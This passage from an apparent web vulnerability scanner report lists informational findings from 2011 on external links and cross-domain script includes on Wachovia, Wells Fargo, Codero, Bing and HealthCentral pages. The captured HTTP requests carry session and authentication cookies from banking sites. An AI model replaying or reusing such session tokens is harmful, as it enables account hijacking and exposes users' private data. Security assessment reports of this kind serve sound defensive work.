<li class="first" id="officelocator"><a href="https://www.wellsfargoadvisors.com/" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locator</a>
...[SNIP]...
</script>

   
   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

14.5. https://onlineservices.wachovia.com/identity/IdentityMgr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /identity/IdentityMgr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /identity/IdentityMgr?action=resetPasswordBegin&returnurl=/auth/AuthService&logincode=brokerageWachsec HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Referer: https://onlineservices.wachovia.com/auth/AuthService?action=presentLogin&logincode=brokerageWachsec&url=https%3a//wachseconline.wachovia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069189096-New%7C1342605189096%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:55:04 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 13241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</title>


   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />

   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />
   <style type="text/css">
...[SNIP]...
</style>
   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />


   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
<div id="header">
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/logo_cobrand.gif" alt="Wachovia A Wells Fargo Company" id="logo" />
       <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script>
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/pcgb_logotype.gif" alt="" id="subbrand" />
   </div>
...[SNIP]...
<li class="first" id="officelocator"><a href="https://www.wellsfargoadvisors.com/" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locator</a>
...[SNIP]...
</script>


       <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

14.6. https://secure.codero.com/order/v/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.codero.com
Path:   /order/v/shop

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /order/v/shop?cart=empty HTTP/1.1
Host: secure.codero.com
Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1822897535.1311040801.1311040801.1311040801.1; __utmb=1.1.10.1311040801; __utmc=1; __utmz=1.1311040801.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2021343739-1311040801254; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1311037236103:ss=1311037201593; orderformv1=9p25frmj6slceji5v0d7oe4u42

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:49 GMT
Server: Apache/2.2
Vary: Host,Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: UBERSID=rfugnf2bmkoul17ds1inessum5; path=/; HttpOnly
Set-Cookie: orderformv1=9p25frmj6slceji5v0d7oe4u42; path=/; HttpOnly
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 17822
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--Header Start-->
   <m
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsk7l4il00000wwytasjl7cu_1n7o/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2"/></div>
...[SNIP]...

14.7. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /ceoportal/signon/index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; TLTSID=687AC65EB1EB10B1991EF87992750532

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:42:27 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 15241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!
...[SNIP]...
</script>

<link href="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/styles/signon.css.jsp" rel="stylesheet" type="text/css" media="screen" />


<!-- favicon -->
...[SNIP]...
<a href="http://www.wellsfargo.com/"><img src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/images/decorative/logo.gif" alt="Wells Fargo" width="62" border="0" height="62" id="logo"/></a>
...[SNIP]...
<a href="http://www.wellsfargo.com/com/comintro.jhtml"><img src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/images/signon/return_to_comm_svcs.gif" alt="Return to Commercial Services" width="11" border="0" height="11"/></a>
...[SNIP]...
<div>
<img src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/images/signon/signon_ceo_title.gif" width="207" height="12" border="0" alt="Commercial Electronic Office&reg;" />
</div>
...[SNIP]...
</form>


<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/wria/1.3.1-sp1/jslib/wria-min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.SignonHelper.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.BookmarksChooser.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.PMFP.js"></script>
...[SNIP]...

14.8. http://www.bing.com/ScriptResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /ScriptResource.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ScriptResource.axd?d=HCasM9I2voxsTT3XtVOiUE0QIuS6zTbyuppihdKiTmgm8T3A8R3n4Y3knRHtffbtaMQduaY2sFW49ENLWRdTy0h2P3CbJTqRu25_-ntiIEE1&t=ffffffffec2d9970 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865531&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Length: 18027
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:11:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,86.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,88.1')">Hotmail</a>
...[SNIP]...
<li>Find more search tips in <a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" onmousedown="return si_T('&amp;ID=FD,109.1')">Help</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,99.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,101.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,103.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,105.1')">About our ads</a>
...[SNIP]...

14.9. http://www.bing.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /WebResource.axd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /WebResource.axd?d=ZFK1T_0LduzipRNw8-MVJA2&t=633802405995006876 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Length: 17938
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 12:11:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,86.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,88.1')">Hotmail</a>
...[SNIP]...
<li>Find more search tips in <a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" onmousedown="return si_T('&amp;ID=FD,109.1')">Help</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,99.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,101.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,103.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,105.1')">About our ads</a>
...[SNIP]...

14.10. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825 HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://paid.outbrain.com/network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:59:05 GMT
Date: Tue, 19 Jul 2011 01:59:05 GMT
Content-Length: 36632
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Common Symptoms of ADD & ADHD in Women - ADHD</title>
<META http-equiv="Con
...[SNIP]...
<link rel="stylesheet" type="text/css"
       href="http://www.healthcentral.com/common/cf/themes/hctemplate/ui/lib/jcarousel/skins/hc/skin.css" />
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript"
   src="http://s7.addthis.com/js/250/addthis_widget.js#username=healthcentral">
</script>
...[SNIP]...
<li class="first"><a href="http://www.addthis.com/bookmark.php"
           class="addthis_button_email">
<img
               src="http://www.healthcentral.com/common/images/icons/page_tools/email.gif"
               width="16" height="16" border="0" alt="email" />
...[SNIP]...
<div>
               <a href="http://www.addthis.com/bookmark.php"
                   class="addthis_button_email">
Email</a>
...[SNIP]...
</script>
Share this:
<a href="http://www.facebook.com/share.php"
   onclick="popupCenter('http://www.facebook.com/share.php?u=http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/','Facebook', 600, 400); return false;">

   <img height="16" width="16" src="http://www.healthcentral.com/common/images/icons/page_tools/facebook.gif" alt="fb">
...[SNIP]...
</a>
<a href="http://twitter.com/share"
   onclick="popupCenter('http://twitter.com/share?url=http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/&source=tweetbutton&text=Hypersensitivity to Noise, Touch & Smell','Twitter',600, 400); return false;">

   <img height="16" width="16" src="http://www.healthcentral.com/common/images/icons/page_tools/twitter.gif" alt="twit">
...[SNIP]...
<li class="first emailthis"><a href="http://www.addthis.com/bookmark.php" class="addthis_button_email">
   <img src="http://www.healthcentral.com/common/images/icons/page_tools/email.gif" width="16" height="16" border="0" alt="email"/>
...[SNIP]...
<div>
   <a href="http://www.addthis.com/bookmark.php" class="addthis_button_email">Email</a>
...[SNIP]...
<li style="float: left; padding-top: 13px;">
<a target="_blank" href="http://www.truste.org/ivalidate.php?url=www.healthcentral.com&amp;sealid=101"><img height="33" width="120" alt="TRUSTe Certified Privacy" src="http://www.healthcentral.com/common/images/home/feat_truste.gif">
...[SNIP]...
<li class="honimg">
<a target="_blank" href="https://www.hon.ch/HONcode/Conduct.html?HONConduct345456"><img height="60" width="43" alt="This website is accredited by Health On the Net Foundation. Click to verify." src="https://www.honcode.ch/HONcode/Seal/HONConduct345456_s1.gif"></a>
</li>
<li class="hontxt">
<a target="_blank" href="https://www.hon.ch/HONcode/Conduct.html?HONConduct345456">We comply with the HONcode standard for<br>
...[SNIP]...
<noscript>
<iframe leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" scrolling="No" frameborder="0" height="1" width="1" src="http://view.atdmt.com/iaction/MSFT_Health_Central_Extended_Data/v3/ato.ORDERID/[atc1.healthnoscript/atc2.healthnoscript/atc3.healthnoscript]"></iframe>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6035874&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
</script><script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js?load=effects,controls" type="text/javascript"></script>
...[SNIP]...

14.11. https://www.wellsfargo.com/locator/atm/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /locator/atm/search?txtCity=&selState=&user=wb&txtZip1=10010 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wachovia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:51:23 GMT
Content-type: text/html; charset=ISO-8859-1
Content-Length: 30236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
...[SNIP]...
<div id="utilities"><a href="https://www.wachovia.com/" class="headerTopOn" tabindex="1">Back to Wachovia.com</a> | <a href="https://www.wachovia.com/helpcenter" tabindex="1">Customer Service</a>
...[SNIP]...
<div id="contentCol">
       

<script type="text/javascript" src="https://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2&mkt=en-us&s=1"></script>
...[SNIP]...
<br />            
           <a href="https://www.wachovia.com/foundation/v/index.jsp?vgnextoid=98fd9e05d1674210VgnVCM200000627d6fa2RCRD&intcid=WF_LOC_BNR_R_DPS_CHK_22201_234x84_01T"><img src="/img/locator/cbd_checkinglocator_234x84.gif" alt="Checking account choices. Select the account that works best for you. Learn More" class="adv"/>
...[SNIP]...

15. Cross-domain script include  previous  next
There are 16 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


15.1. https://onlineservices.wachovia.com/auth/AuthService  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /auth/AuthService?action=presentLogin&logincode=brokerageWachsec&url=https%3a//wachseconline.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/conversion/signon-decision.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069189096-New%7C1342605189096%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:54:53 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 16325

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">


<html>
<head>
<meta http-equiv="Pragma" content="no-store">
<meta http-equiv="Pragma: no-store">
<meta http-equiv="Cache Control"
...[SNIP]...
</title>

<script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
<!-- id="v2_disclaimer" -->

       
                               <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

15.2. https://onlineservices.wachovia.com/identity/IdentityMgr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /identity/IdentityMgr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
